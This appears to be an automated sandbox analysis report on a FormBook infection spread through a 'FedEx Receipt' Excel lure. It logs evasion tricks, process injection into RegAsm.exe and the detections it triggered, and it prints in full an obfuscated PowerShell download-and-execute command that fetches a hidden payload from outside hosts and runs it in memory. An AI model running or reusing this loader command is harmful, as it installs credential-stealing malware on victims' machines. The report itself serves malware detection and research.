Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: FedEx Receipt_53065724643.xls	Stream path 'MBD00023D34/Package' entropy: 7.96088183378 (max. 8.0)
Source: FedEx Receipt_53065724643.xls	Stream path 'Workbook' entropy: 7.99936801752 (max. 8.0)
Source: ~DFE1D622D06AD63FEF.TMP.0.dr	Stream path 'Package' entropy: 7.95091166004 (max. 8.0)
Source: B9930000.0.dr	Stream path 'MBD00023D34/Package' entropy: 7.95091166004 (max. 8.0)
Source: B9930000.0.dr	Stream path 'Workbook' entropy: 7.99916779387 (max. 8.0)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 12_2_023E0101 rdtsc

12_2_023E0101

Contains long sleeps (>= 3 min)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1468			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3293			Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3524	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe TID: 3656	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3776	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3780	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3716	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3828	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Checks if the current process is being debugged

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process queried: DebugPort

Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 12_2_023E0101 rdtsc

12_2_023E0101

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 12_2_023907AC NtCreateMutant,LdrInitializeThunk,

12_2_023907AC

Contains functionality to read the PEB

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 7_2_03640805 mov edx, dword ptr fs:[00000030h]	7_2_03640805
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_02380080 mov ecx, dword ptr fs:[00000030h]	12_2_02380080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023800EA mov eax, dword ptr fs:[00000030h]	12_2_023800EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023A26F8 mov eax, dword ptr fs:[00000030h]	12_2_023A26F8

Enables debug privileges

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\wscript.exe

Network Connect: 41.216.183.13 80

Jump to behavior

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: powershell.exe PID: 3688, type: MEMORYSTR

.NET source code references suspicious native API functions

Source: 10.2.powershell.exe.280000.0.raw.unpack, RunPEE.cs	Reference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref (string)(&name)), ref (string)(&method)), typeof(CreateApi)))
Source: 10.2.powershell.exe.280000.0.raw.unpack, RunPEE.cs	Reference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref (string)(&name)), ref (string)(&method)), typeof(CreateApi)))
Source: 10.2.powershell.exe.280000.0.raw.unpack, RunPEE.cs	Reference to suspicious API methods: WriteProcessMemory(processInformation.ProcessHandle, num7 + num14, array2, array2.Length, ref bytesWritten)
Source: 10.2.powershell.exe.280000.0.raw.unpack, RunPEE.cs	Reference to suspicious API methods: lIuveTP8wwjVYKV1XP(VirtualAllocEx, processInformation.ProcessHandle, 0, length, 12288, 64)
Source: 10.2.powershell.exe.280000.0.raw.unpack, RunPEE.cs	Reference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num15 + 8, ref buffer, 4, ref bytesWritten)

Injects a PE file into a foreign processes

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\magesofrosepetelflowerstogetitgrea.vBS"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('PvLlink = tA4https://uploaddeimagens'+'.com.br/images/004/807/053/original/new_image.jpg?1719846235tA4'+'; PvLwebClient ='+' New-Object System.Net.WebClient'+'; try { PvLdownloadedData = PvLwebCl'+'ient.DownloadData(PvLlink) } catch { '+'Write-H'+'ost tA4Failed To download data from PvLlinktA4 -ForegroundCol'+'or Red; exit };'+' if (PvLdownloadedData -ne PvLnull) { '+'PvLima'+'geTex'+'t = [System.Text.Encoding]::UTF8.GetString(PvLdownloadedData'+'); PvLstartFla'+'g = tA4<<BASE64_START>>tA4; PvLendFlag = tA4<<BASE64_END>'+'>tA4; PvLstartIndex = PvLimageText.IndexOf('+'PvLstartFl'+'ag); PvLendIndex '+'= PvLimag'+'eText.IndexO'+'f(PvLend'+'Flag); if (PvLstartIndex -ge 0 -and '+'PvLendIndex -gt PvLstartIndex) { PvLstartIndex'+' += PvLstartFlag.Length; PvLbase64Length = PvLendI'+'ndex - PvLstartIndex; '+'PvLbase64Command = PvLimageText.Substring(PvLstartIndex,'+' PvLbase64Length)'+'; Pv'+'Lcomma'+'ndBytes = '+'[System.Convert]::FromBase64String(PvLbase64Command);'+' PvLloadedAssembly = [System.Reflection.Ass'+'embly]::Load(PvLcommandB'+'ytes); PvLtype = PvLloadedAssembly'+'.GetType(tA4RunPE.HometA4); PvLmethod = PvLtype.GetMethod(tA4VAItA4).Invoke(PvLnull, [object[]] (tA4txt.JNNB/77088/61.532.59.32//:ptthtA4 , tA4desativadotA4 , tA4desativadotA4 , tA4desativadotA4,tA4RegAsm'+'tA4,tA4tA4))'+' } }').rePLACe(([cHar]80+[cHar]118+[cHar]76),'$').rePLACe(([cHar]116+[cHar]65+[cHar]52),[StRInG][cHar]39)\| IEx"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "('pvllink = ta4https://uploaddeimagens'+'.com.br/images/004/807/053/original/new_image.jpg?1719846235ta4'+'; pvlwebclient ='+' new-object system.net.webclient'+'; try { pvldownloadeddata = pvlwebcl'+'ient.downloaddata(pvllink) } catch { '+'write-h'+'ost ta4failed to download data from pvllinkta4 -foregroundcol'+'or red; exit };'+' if (pvldownloadeddata -ne pvlnull) { '+'pvlima'+'getex'+'t = [system.text.encoding]::utf8.getstring(pvldownloadeddata'+'); pvlstartfla'+'g = ta4<<base64_start>>ta4; pvlendflag = ta4<<base64_end>'+'>ta4; pvlstartindex = pvlimagetext.indexof('+'pvlstartfl'+'ag); pvlendindex '+'= pvlimag'+'etext.indexo'+'f(pvlend'+'flag); if (pvlstartindex -ge 0 -and '+'pvlendindex -gt pvlstartindex) { pvlstartindex'+' += pvlstartflag.length; pvlbase64length = pvlendi'+'ndex - pvlstartindex; '+'pvlbase64command = pvlimagetext.substring(pvlstartindex,'+' pvlbase64length)'+'; pv'+'lcomma'+'ndbytes = '+'[system.convert]::frombase64string(pvlbase64command);'+' pvlloadedassembly = [system.reflection.ass'+'embly]::load(pvlcommandb'+'ytes); pvltype = pvlloadedassembly'+'.gettype(ta4runpe.hometa4); pvlmethod = pvltype.getmethod(ta4vaita4).invoke(pvlnull, [object[]] (ta4txt.jnnb/77088/61.532.59.32//:ptthta4 , ta4desativadota4 , ta4desativadota4 , ta4desativadota4,ta4regasm'+'ta4,ta4ta4))'+' } }').replace(([char]80+[char]118+[char]76),'$').replace(([char]116+[char]65+[char]52),[string][char]39)\| iex"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "('pvllink = ta4https://uploaddeimagens'+'.com.br/images/004/807/053/original/new_image.jpg?1719846235ta4'+'; pvlwebclient ='+' new-object system.net.webclient'+'; try { pvldownloadeddata = pvlwebcl'+'ient.downloaddata(pvllink) } catch { '+'write-h'+'ost ta4failed to download data from pvllinkta4 -foregroundcol'+'or red; exit };'+' if (pvldownloadeddata -ne pvlnull) { '+'pvlima'+'getex'+'t = [system.text.encoding]::utf8.getstring(pvldownloadeddata'+'); pvlstartfla'+'g = ta4<<base64_start>>ta4; pvlendflag = ta4<<base64_end>'+'>ta4; pvlstartindex = pvlimagetext.indexof('+'pvlstartfl'+'ag); pvlendindex '+'= pvlimag'+'etext.indexo'+'f(pvlend'+'flag); if (pvlstartindex -ge 0 -and '+'pvlendindex -gt pvlstartindex) { pvlstartindex'+' += pvlstartflag.length; pvlbase64length = pvlendi'+'ndex - pvlstartindex; '+'pvlbase64command = pvlimagetext.substring(pvlstartindex,'+' pvlbase64length)'+'; pv'+'lcomma'+'ndbytes = '+'[system.convert]::frombase64string(pvlbase64command);'+' pvlloadedassembly = [system.reflection.ass'+'embly]::load(pvlcommandb'+'ytes); pvltype = pvlloadedassembly'+'.gettype(ta4runpe.hometa4); pvlmethod = pvltype.getmethod(ta4vaita4).invoke(pvlnull, [object[]] (ta4txt.jnnb/77088/61.532.59.32//:ptthta4 , ta4desativadota4 , ta4desativadota4 , ta4desativadota4,ta4regasm'+'ta4,ta4ta4))'+' } }').replace(([char]80+[char]118+[char]76),'$').replace(([char]116+[char]65+[char]52),[string][char]39)\| iex"			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.572393778.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.572358514.0000000000250000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.572393778.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
